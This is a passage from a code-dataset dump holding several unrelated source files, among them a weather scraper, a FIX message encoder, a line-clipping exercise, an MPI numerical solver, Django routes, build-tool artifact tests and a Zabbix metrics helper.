pickle.load(open(classifier_path, 'rb'))\r\n    ProbabilityColName = 'Probability_' + classifier_name\r\n    predictions = clf.predict_proba(inputFileOrganised)\r\n    outputDf[ProbabilityColName] = predictions[:, 1]\r\n\r\n    # CREATE LIST OF GAPS BASED ON SHORTEST BOUT\r\n    vidInfPath = config.get('General settings', 'project_path')\r\n    vidInfPath = os.path.join(vidInfPath, 'logs', 'video_info.csv')\r\n    vidinfDf = pd.read_csv(vidInfPath)\r\n    fps = vidinfDf.loc[vidinfDf['Video'] == 
str(sample_feature_file_Name.replace('.' +wfileType, ''))]\r\n try:\r\n fps = int(fps['fps'])\r\n except TypeError:\r\n print('Error: make sure all the videos that are going to be analyzed are represented in the project_folder/logs/video_info.csv file')\r\n\r\n outFname = sample_feature_file_Name + '.' + wfileType\r\n csv_dir_out_validation = config.get('General settings', 'csv_path')\r\n csv_dir_out_validation = os.path.join(csv_dir_out_validation,'validation')\r\n if not os.path.exists(csv_dir_out_validation):\r\n os.makedirs(csv_dir_out_validation)\r\n outFname = os.path.join(csv_dir_out_validation, outFname)\r\n save_df(outputDf, wfileType, outFname)\r\n print('Predictions generated.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"simba/runmodel_1st.py","file_name":"runmodel_1st.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"526617046","text":"'''\n@Description this file is to provide code for scraping the weather information\n@Author rarer_997\n@Date 2019-10-08\n'''\nfrom urllib.request import urlopen # b_soup_1.py\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, date, time, timedelta\nimport pandas as pd\n\ncity_name = []\nfor i in range(3370,3694):\n city_name.append(str(i))\n'''\n@Description build the city and its relevant id dictionary\n@Author rarer_997\n@Date 2019-10-08\n'''\ncity = {\"3370\":\"Canberra\",\"3372\":\"Adelaide\",\"3418\":\"Brisbane\",\"3586\":\"Melbourne\",\"3677\":\"Sydney\"}\n\n#the function of getting the month's list between the start month and end month\ndef get_month_list(datestart,dateend):\n month = []\n while datestart<=dateend:\n date_temp = datestart.strftime('%Y-%m')\n if date_temp not in month:\n month.append(date_temp)\n datestart+=timedelta(days=1)\n return month\n\nstart = datetime.strptime(\"2013-11\",'%Y-%m')\nend = datetime.strptime(\"2018-5\",'%Y-%m')\n'''\n@Description get the month list from 2013-11 to 2018-05\n@Author rarer_997\n@Date 2019-10-08\n'''\nmonth = get_month_list(start,end)\n\nwriter = pd.ExcelWriter('weather_info.xlsx')\nfor city_number,city_name in city.items():\n name_list = ['date','start_weather','end_weather','max_temp','min_temp','start_wind','end_wind']\n City = pd.DataFrame(columns=name_list)\n for month_index in month:\n '''\n @Description get the certain cities' certain month's URL\n @Author rarer_997\n @Date 2019-10-08\n '''\n address = \"http://www.tianqihoubao.com/guoji/\"+city_number+\"/\"+month_index+\".html\"\n try:\n html = requests.get(address).content\n except:\n print(address)\n continue\n soup = BeautifulSoup(html,features=\"html.parser\")\n soup2 = soup.findAll('div', class_ = 'wdetail')\n for info in soup2:\n tr_list = info.find_all('tr')[1:]\n for tr in tr_list:\n temp_dict = {}\n td_list = tr.find_all('td')\n '''\n @Description get the relevant weather information and store them in a dict\n @Author rarer_997\n @Date 2019-10-08\n '''\n temp_dict['date'] = td_list[0].text.strip().replace(\"\\n\",\"\")\n temp_dict['start_weather'] = td_list[1].text.strip().replace(\"\\n\",\"\").split(\"/\")[0].strip()\n temp_dict['end_weather'] = td_list[1].text.strip().replace(\"\\n\",\"\").split(\"/\")[1].strip()\n temp_dict['max_temp'] = td_list[2].text.strip().replace(\"\\n\",\"\").split(\"/\")[0].strip()\n temp_dict['min_temp'] = td_list[2].text.strip().replace(\"\\n\",\"\").split(\"/\")[1].strip()\n temp_dict['start_wind'] = 
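A quick check of the get_month_list helper above: it walks day by day and records each new 'YYYY-MM' label once (note that strptime('2018-5', '%Y-%m') parses to the first of that month).

from datetime import datetime, timedelta

def get_month_list(datestart, dateend):
    month = []
    while datestart <= dateend:
        label = datestart.strftime('%Y-%m')
        if label not in month:
            month.append(label)
        datestart += timedelta(days=1)
    return month

print(get_month_list(datetime(2013, 11, 1), datetime(2014, 2, 1)))
# ['2013-11', '2013-12', '2014-01', '2014-02']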
td_list[3].text.strip().replace(\"\\n\",\"\").split(\"/\")[0].strip()\n temp_dict['end_wind'] = td_list[3].text.strip().replace(\"\\n\",\"\").split(\"/\")[1].strip()\n City = City.append(temp_dict,ignore_index = True)\n City.to_excel(writer,sheet_name=city_name,index=False,encoding=\"utf-8\")\nwriter.save()\nwriter.close()","sub_path":"Scrape/weather_scrape/weather_data_scrap.py","file_name":"weather_data_scrap.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"531940743","text":"from typing import Iterator, List, Tuple\nfrom ..meta_data import (\n message_member_iter,\n MessageMemberMetaData,\n MessageMetaData,\n ProtocolMetaData,\n FieldMessageDataMap\n)\nfrom .errors import EncodingError\nfrom .common import SOH, encode_value\n\n\ndef _encode_fields(\n protocol: ProtocolMetaData,\n encoded_message: List[Tuple[bytes, bytes]],\n data: FieldMessageDataMap,\n meta_data: Iterator[MessageMemberMetaData]\n) -> None:\n for meta_datum in meta_data:\n # Check for required fields.\n if meta_datum.member.name not in data:\n if meta_datum.is_required:\n raise EncodingError(f'required field \"{meta_datum.member.name}\" is missing')\n continue\n\n item_data = data[meta_datum.member.name]\n if meta_datum.type == 'field':\n value = encode_value(protocol, meta_datum.member, item_data)\n encoded_message.append((meta_datum.member.number, value))\n elif meta_datum.type == 'group':\n value = encode_value(protocol, meta_datum.member, len(item_data))\n encoded_message.append((meta_datum.member.number, value))\n for group_item in item_data:\n _encode_fields(\n protocol,\n encoded_message,\n group_item,\n message_member_iter(meta_datum.children.values())\n )\n else:\n raise EncodingError(f'unknown type \"{meta_datum.type}\" for item \"{meta_datum.member.name}\"')\n\n\ndef _regenerate_integrity(\n protocol: ProtocolMetaData,\n encoded_message: List[Tuple[bytes, bytes]],\n sep: bytes,\n convert_sep_for_checkum: bool\n) -> bytes:\n body = sep.join(field + b'=' + value for field, value in encoded_message[2:-1]) + sep\n body_lengh = len(body)\n\n encoded_header = [\n (protocol.fields_by_name['BeginString'].number, protocol.begin_string),\n (protocol.fields_by_name['BodyLength'].number, str(body_lengh).encode('ascii'))\n ]\n header = sep.join(field + b'=' + value for field, value in encoded_header) + sep\n\n buf = header + body\n\n # Calculate the checksum\n check_sum = sum(buf if sep == SOH or not convert_sep_for_checkum else buf.replace(sep, SOH)) % 256\n buf += protocol.fields_by_name['CheckSum'].number + b'=' + f'{check_sum:#03}'.encode('ascii') + sep\n\n return buf\n\n\ndef encode(\n protocol: ProtocolMetaData,\n data: FieldMessageDataMap,\n meta_data: MessageMetaData,\n *,\n sep: bytes = SOH,\n regenerate_integrity: bool = True,\n convert_sep_for_checksum: bool = True\n) -> bytes:\n encoded_message: List[Tuple[bytes, bytes]] = []\n\n if regenerate_integrity:\n data['BeginString'] = protocol.begin_string.decode('ascii')\n data['BodyLength'] = 0\n data['CheckSum'] = '000'\n\n _encode_fields(protocol, encoded_message, data, message_member_iter(protocol.header.values()))\n _encode_fields(protocol, encoded_message, data, message_member_iter(meta_data.fields.values()))\n _encode_fields(protocol, encoded_message, data, message_member_iter(protocol.trailer.values()))\n\n if regenerate_integrity:\n buf = _regenerate_integrity(protocol, encoded_message, sep, convert_sep_for_checksum)\n else:\n buf = sep.join(field + b'=' + 
value for field, value in encoded_message) + sep\n\n return buf\n","sub_path":"src/aiofix/fix_message/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"106625257","text":"import numpy as np\r\nimport math as m\r\n\r\n#Calculate D:\r\ndef D(x_0,y_0,x_1,y_1):\r\n x_D=(x_1-x_0)\r\n y_D=(y_1-y_0)\r\n D=[x_D,y_D]\r\n return D\r\n\r\ndef NiD(func):\r\n N=[(-1,0),(0,1),(1,0),(0,-1)] #[left, top, right, bottom]\r\n ND=[] #[left, top, right, bottom]\r\n for i in range(0,len(N)):\r\n ND.append(np.dot(N[i],func))\r\n\r\n return ND\r\n\r\n\r\n# P=(x_0,y_0)+(np.dot(t,D))\r\ndef calculateT(i):\r\n if(i==0):\r\n return round((-(x_0-x_min)/(x_1-x_0)),8) # t_left(x_0,x_1,x_min)\r\n\r\n elif(i==1):\r\n return round((-(x_0-x_max)/(x_1-x_0)),8) #t_right(x_0,x_1,x_max):\r\n\r\n elif(i==2):\r\n return round((-(y_0-y_max)/(y_1-y_0)),8) #t_top(y_0,y_1,y_max):\r\n\r\n elif(i==3):\r\n return round((-(y_0-y_min)/(y_1-y_0)),8) #t_bottom(y_0,y_1,y_min):\r\n\r\n\r\ndef P(x_0, y_0, t, func):\r\n D=func\r\n tdotD=np.dot(t,D)\r\n p=np.sum([[x_0,y_0],tdotD],axis=0)\r\n return p\r\n\r\n\r\ndef cyrusBeck(x_0,y_0,x_1,y_1):\r\n lineSegment=[[x_0,y_0],[x_1,y_1]]\r\n N=[(-1,0),(0,1),(1,0),(0,-1)]\r\n c=0\r\n tEntering=[] #[left, top, right, bottom]\r\n tLeaving=[] #[left, top, right, bottom]\r\n d=D(x_0,y_0,x_1,y_1)\r\n NdotD=[] #[left, top, right, bottom]\r\n NdotPoints=[]\r\n t=[]\r\n P1=[x_1,y_1]\r\n P0=[x_0,y_0]\r\n P0_new=[]\r\n P1_new=[]\r\n \r\n if(P1==P0):\r\n print(\"lol\")\r\n else:\r\n t_Enter=0\r\n t_Leave=1 \r\n NdotD=NiD(d)\r\n for i in range(0,len(NdotD)):\r\n if(NdotD[i]!=0):\r\n theT=calculateT(i)\r\n t.append(theT)\r\n if(NdotD[i]<0):\r\n NdotPoints.append(\"PL\")\r\n finaltE=t[i]\r\n tEntering.append(finaltE)\r\n elif(NdotD[i]>0):\r\n NdotPoints.append(\"PE\")\r\n finaltL=t[i]\r\n tLeaving.append(finaltL)\r\n\r\n \r\n print(f\"This is N points based on Ni.D sequencing left, top, right, bottom:{N}\")\r\n print(f\"This is Ni.D sequencing left, top, right, bottom: {NdotD}\")\r\n print(f\"This is PL/PE points based on Ni.D sequencing left, top, right, bottom: {NdotPoints}\")\r\n print(f\"This is all the t values sequencing left, top, right, bottom: {t}\")\r\n print(f\"These are all the tE that enters the clip window as per to PE: {tEntering}\")\r\n print(f\"These are all the tL that enters the clip window as per to PL: {tLeaving}\")\r\n \r\n \r\n print(f\"t_e max: {max(tEntering)}\")\r\n print(f\"t_l min: {min(tLeaving)}\")\r\n print(f\"Value of D: {d}\")\r\n print(\"---------------------------------------------------------------\")\r\n if(max(tEntering)>min(tLeaving)):\r\n print(\"tE is greater then tL\") \r\n else:\r\n P0_new = P(x_0,y_0,max(tEntering),d)\r\n P1_new = P(x_0,y_0,min(tLeaving),d)\r\n \r\n\r\n return [P0_new, P1_new], max(tEntering), min(tLeaving)\r\n\r\n\r\n#boundary\r\nx_min=21\r\ny_min=42\r\n\r\nx_max=-2\r\ny_max=1\r\n\r\n#points\r\nx_0=-1\r\ny_0=55\r\n\r\nx_1=68\r\ny_1=-37\r\n\r\nresult=[]\r\nresult, tE, tL=cyrusBeck(x_0,y_0,x_1,y_1)\r\nT=tL-tE\r\nprint(f\"Value of tL-tE: {T}\")\r\nx=result[0]\r\ny=result[1]\r\nx_2=np.square(np.subtract(x[0],y[0]))\r\ny_2=np.square(np.subtract(x[1],y[1]))\r\nfinal=x_2+y_2\r\nprint(f\"Length of lineSegment: {m.sqrt(final)}\")\r\n\r\nprint(f\"P({tE})= {result[0]}\")\r\nprint(f\"P({tL})= 
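The FIX trailer arithmetic above boils down to two rules: BodyLength counts the bytes between the BodyLength field and the trailer, and CheckSum is the byte sum of everything before the CheckSum field, modulo 256, rendered as exactly three ASCII digits. A standalone sketch of the checksum half:

SOH = b'\x01'

def fix_checksum(buf: bytes) -> bytes:
    # Byte sum mod 256, zero-padded to three digits: b'007', b'123', ...
    return f'{sum(buf) % 256:03d}'.encode('ascii')

msg = SOH.join([b'8=FIX.4.4', b'9=12', b'35=A', b''])  # trailing b'' adds the final SOH
print(fix_checksum(msg))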
{result[1]}\")\r\n","sub_path":"CyrusBeck.py","file_name":"CyrusBeck.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"570233711","text":"from potentialflowvisualizer import *\n\nfield = Flowfield(\n objects=[\n Freestream(u=1, v=0),\n Source(strength=5, x=-5, y=0),\n Vortex(strength=5, x=0, y=5),\n Doublet(strength=5, x=0, y=0, alpha=0),\n LineVortex(strength=-5, x1 = 0, y1 = -5, x2 = 5, y2 = 0),\n LineSource(strength=-5, x1 = 0, y1 = 5, x2 = 5, y2 = 0),\n ]\n)\n\nfield.draw(\"potential\")\nfield.draw(\"streamfunction\")\nfield.draw(\"xvel\")\nfield.draw(\"yvel\")\nfield.draw(\"velmag\")\n","sub_path":"examples/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"192868297","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport math\nimport sys\n\nfrom mpi4py import MPI\n\nif __name__ == \"__main__\":\n a = 0.25; T = 2.0; X = 100.0\n X_original = X\n fi = lambda x: math.sin(x/10) #t=0\n ksi = lambda t: t**3#x=0\n f = lambda t, x: math.sin(x*t/2) + t**3\n \n \n h = h_original = 0.01\n tau = tau_original = 0.01\n # tau = h/a \n # tau = 1.2 * h/a \n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm.Get_rank()\n est_time = []\n nodes_amount = []\n # y = [] \n # t =[] \n # comp_per_unit = 0\n # last_unit_comp = 0\n if size != 1:\n if sys.argv[1] == 'speedup':\n repeat_times = 10\n else:\n repeat_times = 1\n\n transfer_time = 0\n for _ in range(repeat_times):\n X = X_original\n X += h\n nodes_amount.append((X/h)*(T/tau))\n comp_per_unit = (X // h) // size #computations per unit\n if X // h % size == 0:\n last_unit_comp = comp_per_unit + 1 #last unit computations\n else:\n last_unit_comp = (X // h) - comp_per_unit * (size-1) + 1\n t = np.arange(0, T + tau, tau)\n\n if rank != size - 1:\n x = np.arange(rank * comp_per_unit * h, (rank + 1) * comp_per_unit * h - h*0.0000001, h)#crashed here smtimes\n else:\n x = np.arange(rank * comp_per_unit * h, (rank * comp_per_unit + last_unit_comp) * h, h)\n\n y = [0] * len(t)\n for i in range(len(t)):\n y[i] = [0.] 
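The Cyrus-Beck code above rests on the parametric form P(t) = P0 + t*D with D = P1 - P0; the visible piece of the segment is the parameter window [max tE, min tL]. A tiny sketch of the evaluation step, reusing the script's endpoints:

import numpy as np

P0 = np.array([-1.0, 55.0])
P1 = np.array([68.0, -37.0])
D = P1 - P0

def P(t):
    return P0 + t * D

print(P(0.0), P(1.0))  # the endpoints: P(0) == P0 and P(1) == P1
print(P(0.25))         # a quarter of the way along the segment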
* len(x)\n\n for j in range(0, len(x)):\n y[0][j] = fi(x[j]) # edge conditions x: u(0,x) = fi(x)\n \n\n if rank != 0 and rank != size - 1:\n for i in range(0, len(t) - 1):\n left_border = comm.recv(source=rank-1, tag=1) # left border\n comm.send(y[i][len(x) - 1], dest=rank+1, tag=1)\n right_border = comm.recv(source=rank+1, tag=0) # right border\n comm.send(y[i][0], dest=rank-1, tag=0)\n y[i+1][0] = 0.5*(y[i][1] + left_border) - 0.5*(tau/h)*(y[i][1] - left_border) + tau*f(t[i], x[0])#mb err\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = 0.5*(right_border + y[i][len(x)-2]) - 0.5*(tau/h)*(right_border - y[i][len(x)-2]) + tau*f(t[i], x[len(x) - 1])\n y = np.array(y)\n comm.send(y, dest = size - 1, tag=2)\n # print(\"rank: {} time: {} rcvd from b: {} rcvd from s: {} send to b: {} send to s: {}\".format(rank, ))\n\n\n if rank == 0:\n for i in range(0, len(t)):\n y[i][0] = ksi(t[i])\n comp_time = 0\n for i in range(0, len(t) - 1):\n tr_s = MPI.Wtime()\n comm.send(y[i][len(x) - 1], dest=1, tag=1)\n right_border = comm.recv(source=1, tag=0)\n transfer_time = MPI.Wtime() - tr_s\n start = MPI.Wtime()\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = 0.5*(right_border + y[i][len(x)-2]) - 0.5*(tau/h)*(right_border - y[i][len(x)-2]) + tau*f(t[i], x[len(x) - 1])\n comp_time += MPI.Wtime() - start\n y = np.array(y)\n est_time.append(comp_time)\n print(\"start time: {}\".format(comp_time))\n comm.send(y, dest=size-1, tag=2)\n\n if rank == size - 1:\n for i in range(0, len(t) - 1):\n left_border = comm.recv(source=rank-1, tag=1)\n comm.send(y[i][0], dest=rank-1, tag=0)\n y[i+1][0] = 0.5*(y[i][1] + left_border) - 0.5*(tau/h)*(y[i][1] - left_border) + tau*f(t[i], x[0])\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = y[i][len(x) - 1] - tau*(y[i][len(x) - 1]-y[i][len(x) - 2])/h + tau*f(t[i], x[j])\n y = np.array(y)\n for i in range(size - 2, -1, -1):\n recieved_data = comm.recv(source=i, tag=2)\n y = np.concatenate((recieved_data, y), axis=1)\n\n h *= 0.93\n tau *= 0.93\n\n\n\n\n if rank == size - 1 and sys.argv[1] == 'plot':\n print(\"cpu: \", comp_per_unit, \" luc: \", last_unit_comp)\n fig3 = plt.figure()\n ax3 = fig3.add_subplot(111, projection='3d')\n x = np.arange(0, ((size - 1) * comp_per_unit + last_unit_comp) * h_original, h_original)\n x, t = np.meshgrid(x, t)\n print('x: ',x.shape,' t: ', t.shape, ' y: ', y.shape )\n ax3.plot_surface(x, t, y)\n\n ax3.set_xlabel('plot for %d workers' % size)\n ax3.set_xlabel('x')\n ax3.set_ylabel('t')\n ax3.set_zlabel('u')\n # plt.show()\n plt.savefig('%dwplot.png' % (size))\n\n\n if rank == 0 and sys.argv[1] == 'speedup':\n fig3 = plt.figure()\n ax3 = fig3.add_subplot(111)\n x = np.array(nodes_amount)\n y = np.array(est_time)\n # ax3.set_xscale('log')\n # ax3.set_yscale('log')\n ax3.plot(x, y)\n ax3.set_title('speedup for %d workers\\nwith ttpn (ms): %f\\nestimated time: %f' % (size, transfer_time / (1000*(h/0.93)*(tau/0.93)), est_time[0]))\n ax3.set_xlabel('nodes amount')\n ax3.set_ylabel('time estimated')\n # plt.show()\n plt.savefig('%dwspeedup.png' % (size))\n else:\n x = np.arange(0, X + h, h)\n t = t = np.arange(0, T + tau, tau)\n y = [0] * len(t)\n start = MPI.Wtime()\n for i in range(len(t)):\n y[i] = [0.] 
* len(x)\n            y[i][0] = ksi(t[i])\n        for j in range(0, len(x)):\n            y[0][j] = fi(x[j]) # edge conditions x: u(0,x) = fi(x)\n        for i in range(0, len(t) - 1):\n            for j in range(1, len(x) - 1):\n                y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n            y[i+1][len(x) - 1] = y[i][len(x) - 1] - tau*(y[i][len(x) - 1]-y[i][len(x) - 2])/h + tau*f(t[i], x[j])\n        finish = MPI.Wtime()\n        fig = plt.figure()\n        ax = fig.add_subplot(111,projection='3d')\n        x, t = np.meshgrid(x, t)\n        u = np.array(y)\n        ax.plot_surface(x,t,u)\n        ax.set_title('line version.\\nestimated time: %f' % (finish - start))\n        ax.set_xlabel('x')\n        ax.set_ylabel('t')\n        ax.set_zlabel('u')\n        plt.savefig('1w.png')\n    # python3 app.py\n","sub_path":"PP/transferEquation/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"369375245","text":"from django.urls import path\nfrom blog.views import PostDetailView, search, PostBlogView, UpdateBlogView, DeleteBlogView, CommentReplyView\n\n\nurlpatterns = [\n\n    path( 'post_blog_page/', PostBlogView.as_view(), name='post_blog_page' ),\n    path( 'post_blog_page/update/', UpdateBlogView.as_view(), name='update_blog_page' ),\n    path( 'post_blog_page/delete/', DeleteBlogView.as_view(), name='delete_blog_page' ),\n    path( 'post//', PostDetailView.as_view(), name='post' ),\n    path( 'post//comment//reply', CommentReplyView.as_view(), name='reply' ),\n    path( 'q', search, name='search' ),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"156525962","text":"n=int(input())\nif n==1:\n    print(1)\nelif n==11:\n    print(2)\nelse:\n    s='111'\n    while True:\n        \n        a=int(s)\n        if a%n==0:\n            print(len(s))\n            break\n        else:\n            s+='1'\n    ","sub_path":"Code/CodeRecords/2367/60648/268241.py","file_name":"268241.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472100624","text":"# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nimport os\nimport unittest\n\nfrom pants.cache.artifact import ArtifactError, DirectoryArtifact, TarballArtifact\nfrom pants.util.contextutil import temporary_dir\nfrom pants.util.dirutil import safe_mkdir, safe_open\nfrom pants_test.test_base import TestBase\n\n\nclass TarballArtifactTest(TestBase):\n\n  def setUp(self):\n    super().setUp()\n    # Init engine because decompression now goes through native code.\n    self._init_engine()\n    TarballArtifact.NATIVE_BINARY = self._scheduler._scheduler._native\n\n  def test_get_paths_after_collect(self):\n    with temporary_dir() as tmpdir:\n      artifact_root = os.path.join(tmpdir, 'artifacts')\n      cache_root = os.path.join(tmpdir, 'cache')\n      safe_mkdir(cache_root)\n\n      file_path = self.touch_file_in(artifact_root)\n\n      artifact = TarballArtifact(artifact_root, os.path.join(cache_root, 'some.tar'))\n      artifact.collect([file_path])\n\n      self.assertEqual([file_path], list(artifact.get_paths()))\n\n  def test_does_not_exist_when_no_tar_file(self):\n    with temporary_dir() as tmpdir:\n      artifact_root = os.path.join(tmpdir, 'artifacts')\n      cache_root = os.path.join(tmpdir, 'cache')\n      safe_mkdir(cache_root)\n\n      artifact = TarballArtifact(artifact_root, os.path.join(cache_root, 'some.tar'))\n      self.assertFalse(artifact.exists())\n\n  
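The stencil in the transfer-equation solver above (both the MPI and serial branches) is a Lax-Friedrichs style update for u_t + a*u_x = f. Note the declared a = 0.25 never enters the update, so the scheme effectively runs with a = 1, and it is stable only while the Courant number |a|*tau/h stays at or below 1; a sketch of the check:

a, tau, h = 1.0, 0.01, 0.01  # the update's effective wave speed and the script's steps
courant = abs(a) * tau / h
assert courant <= 1.0, f"unstable: Courant number {courant} > 1"
print(f"Courant number: {courant}")  # 1.0, right on the stability boundary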
def test_exists_true_when_exists(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n cache_root = os.path.join(tmpdir, 'cache')\n safe_mkdir(cache_root)\n\n path = self.touch_file_in(artifact_root)\n\n artifact = TarballArtifact(artifact_root, os.path.join(cache_root, 'some.tar'))\n artifact.collect([path])\n\n self.assertTrue(artifact.exists())\n\n def test_non_existent_tarball_extraction(self):\n with temporary_dir() as tmpdir:\n artifact = TarballArtifact(artifact_root=tmpdir, tarfile_='vapor.tar')\n with self.assertRaises(ArtifactError):\n artifact.extract()\n\n def test_corrupt_tarball_extraction(self):\n with temporary_dir() as tmpdir:\n path = self.touch_file_in(tmpdir, content='invalid')\n artifact = TarballArtifact(artifact_root=tmpdir, tarfile_=path)\n with self.assertRaises(ArtifactError):\n artifact.extract()\n\n def touch_file_in(self, artifact_root, content=''):\n path = os.path.join(artifact_root, 'some.file')\n with safe_open(path, 'w') as f:\n f.write(content)\n return path\n\n\nclass DirectoryArtifactTest(unittest.TestCase):\n def test_exists_when_dir_exists(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n\n artifact_dir = os.path.join(tmpdir, 'cache')\n safe_mkdir(artifact_dir)\n\n artifact = DirectoryArtifact(artifact_root, artifact_dir)\n self.assertTrue(artifact.exists())\n\n def test_does_not_exist_when_dir_missing(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n\n artifact_dir = os.path.join(tmpdir, 'cache')\n\n artifact = DirectoryArtifact(artifact_root, artifact_dir)\n self.assertFalse(artifact.exists())\n","sub_path":"tests/python/pants_test/cache/test_artifact.py","file_name":"test_artifact.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"57905619","text":"def same_ascii(a, b):\n s1 = 0\n s2 = 0\n for i in a:\n s1 += ord(i)\n for i in b:\n s2 += ord(i)\n if s1 == s2:\n return True\n else:\n return False\n","sub_path":"_algorithms_challenges/edabit/_Edabit-Solutions-master/Same ASCII_/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"83250930","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport lib.utils as utils\n\n\ndef jdumps(o):\n return json.dumps(o, ensure_ascii=False)\n\n\ndef i_m(base_metric, tpl, **kwargs):\n if not kwargs:\n return \".\".join([base_metric, tpl])\n\n prep_kwargs = {\n kw: _str_prep(kwargs[kw]) for kw in kwargs\n }\n return \".\".join([base_metric, tpl.format(**prep_kwargs)])\n\n\ndef z_m(tpl, **kwargs):\n prep_kwargs = {\n _str_prep(kw): _str_prep(kwargs[kw]) for kw in kwargs\n }\n return tpl.format(**prep_kwargs)\n\n\ndef _str_prep(s):\n if isinstance(s, (int, float)):\n s = str(s)\n return reduce(\n lambda s, d: s.replace(d[0], d[1]),\n ((\".\", \"_\"), (\"_[\", \".\"), (\"]\", \"\")),\n s\n )\n\ndef transliterate(name):\n to_replace = {'ж': 'zh', 'о': 'o', 'п': 'p', 'а': 'a', 'б': 'b', 'в': 'v',\n 'г': 'g', 'д': 'd', 'е': 'e', 'ё': 'e', 'з': 'z', 'и': 'i',\n 'й': 'i', 'к': 'k', 'л': 'l', 'м': 'm', 'н': 'n', 'р': 'r',\n 'с': 's', 'т': 't', 'у': 'u', 'ф': 'f', 'х': 'h', 'ц': 'c',\n 'ч': 'cz', 'ш': 'sh', 'щ': 'scz', 'ъ': '', 'ы': 'y', 'ь': '',\n 'э': 'e', 'ю': 'u', 'я': 'ja', 'А': 'a', 'Б': 'b', 'В': 'v',\n 'Г': 'g', 'Д': 'd', 'Е': 'e', 'Ё': 'e', 
'Ж': 'zh', 'З': 'z',\n 'И': 'i', 'Й': 'i', 'К': 'k', 'Л': 'l', 'М': 'm', 'Н': 'n',\n 'О': 'o', 'П': 'p', 'Р': 'r', 'С': 's', 'Т': 't', 'У': 'u',\n 'Ф': 'f', 'Ц': 'c', 'Ч': 'cz', 'Ш': 'sh', 'Щ': 'scz', 'Ъ': '',\n 'Ы': 'y', 'Ь': '', 'Э': 'e', 'Ю': 'u', 'Я': 'ja', ',': '',\n '?': '', ' ': '_', '~': '', '!': '', '@': '', '#': '', '$': '',\n '%': '', '^': '', '&': '', '*': '', '(': '', ')': '',\n '=': '', '+': '', ':': '', ';': '', '<': '', '>': '', '\'': '',\n '\"': '', '\\\\': '', '/': '', '№': '', '[': '', ']': '', '{': '',\n '}': '', 'ґ': 'g', 'ї': 'i', 'є': 'e', 'Ґ': 'g', 'Ї': 'i', 'Є': 'e',\n u'\x01': '', u'\x05': ''}\n\n for key in to_replace:\n try:\n name = name.replace(unicode(key), to_replace[key])\n except:\n try:\n name = name.replace(key, to_replace[key])\n except:\n pass\n return name\n\n\ndef to_zabbix(analyzer_name, raw_metrics):\n metrics = {\n \"autodiscovery\": [],\n \"static\": [],\n \"dynamic\": []\n }\n m_autodiscovery = metrics[\"autodiscovery\"].append\n m_static = metrics[\"static\"].append\n m_dynamic = metrics[\"dynamic\"].append\n\n mcasts = set()\n mcast_sids = set()\n mcast_sids_pids = set()\n qam_tss = set()\n qam_tss_sids = set()\n for ts in raw_metrics[\"tss\"]:\n mcasts.add(ts)\n ts_info = raw_metrics[\"tss\"][ts]\n for svc in ts_info[\"services\"]:\n if svc == \"count\":\n continue\n svc_info = ts_info[\"services\"][svc]\n mcast_sid = z_m(\"{ts}*SID-{sid}\", ts=ts, sid=svc)\n mcast_sids.add(mcast_sid)\n for pid in svc_info[\"pids\"]:\n mcast_sid_pid = z_m(\"{mcast_sid}*PID-{pid}\", mcast_sid=mcast_sid, pid=pid)\n mcast_sids_pids.add(mcast_sid_pid)\n\n m_autodiscovery((analyzer_name, \"get_ts\", jdumps({\"data\": [{\"{#TS}\": _str_prep(ts)} for ts in mcasts]})))\n if raw_metrics.get(\"is_scr\", False):\n 